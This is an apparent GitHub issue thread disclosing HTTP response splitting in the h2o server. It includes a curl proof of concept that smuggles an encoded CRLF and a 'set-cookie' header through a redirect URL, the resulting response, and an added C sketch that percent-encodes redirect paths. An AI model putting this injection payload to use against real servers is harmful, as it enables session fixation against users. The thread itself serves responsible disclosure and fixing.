HTTP response splitting #682

Closed
nanorc opened this issue Jan 7, 2016 · 2 comments
nanorc commented Jan 7, 2016

Hi,

I found out that I can do HTTP response splitting in h2o by feeding the URL with a carriage return
and new line (CRLF). Example:

$ curl -I "http://fooexample.com/en/%0d%0aset-cookie:test=test"
HTTP/1.1 301 Redirected
Date: Thu, 07 Jan 2016 08:56:34 GMT
Server: h2o/1.6.0
Connection: keep-alive
location: https://fooexample.com/en/
set-cookie:test=test
content-type: text/html; charset=utf-8

The h2o config:

hosts:
    "fooexample.com":
        listen:
            port: 80
        paths:
            "/":
                redirect:
                    status: 301
                    url: https://fooexample.com/
    "fooexample.com":
        listen:
            port: 443
            ssl:
                certificate-file: /path/to/fooexample.crt
                key-file:         /path/to/fooexample.key

This issue could lead to a session fixation attack where an attacker could coerce a victim
into clicking a link with an injected predefined cookie.
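
As an added example (not code from h2o or from this thread), one way a redirect handler can keep a decoded request path from splitting the response is to percent-encode it before it goes into the `location` header. The function names are hypothetical, and the sketch assumes the handler appends the already-decoded path to the configured `url`.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: 1 if value has no CR, LF or NUL and may be sent as a header value. */
int header_value_is_safe(const char *value, size_t len)
{
    return !memchr(value, '\r', len) && !memchr(value, '\n', len) && !memchr(value, '\0', len);
}

/* Bytes that may appear unescaped in a URI path (RFC 3986 pchar plus '/'). */
static int is_path_safe(unsigned char c)
{
    return isalnum(c) || (c != '\0' && strchr("-._~!$&'()*+,;=:@/", c) != NULL);
}

/* Hypothetical helper: writes prefix + percent-encoded path; returns length written or -1. */
long build_redirect_location(const char *prefix, const char *path, size_t path_len,
                             char *out, size_t out_size)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t n = strlen(prefix);
    if (!header_value_is_safe(prefix, n) || n >= out_size)
        return -1; /* unsafe configured prefix or buffer too small */
    memcpy(out, prefix, n);
    for (size_t i = 0; i < path_len; i++) {
        unsigned char c = (unsigned char)path[i];
        if (n + (is_path_safe(c) ? 1 : 3) >= out_size)
            return -1;
        if (is_path_safe(c)) {
            out[n++] = (char)c;
        } else { /* CR becomes %0D, LF becomes %0A */
            out[n++] = '%';
            out[n++] = hex[c >> 4];
            out[n++] = hex[c & 0x0F];
        }
    }
    out[n] = '\0';
    return (long)n;
}

int main(void)
{
    char loc[128];
    const char path[] = "en/\r\nset-cookie:test=test"; /* constructed: decoded path from the report */
    if (build_redirect_location("https://fooexample.com/", path, sizeof(path) - 1, loc, sizeof(loc)) > 0)
        printf("location: %s\n", loc);
    return 0;
}
```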

kazuho (Member) commented Jan 7, 2016

Thank you for reporting the issue. Looking into it.

nanorc (Author) commented Jan 8, 2016

Thanks @kazuho
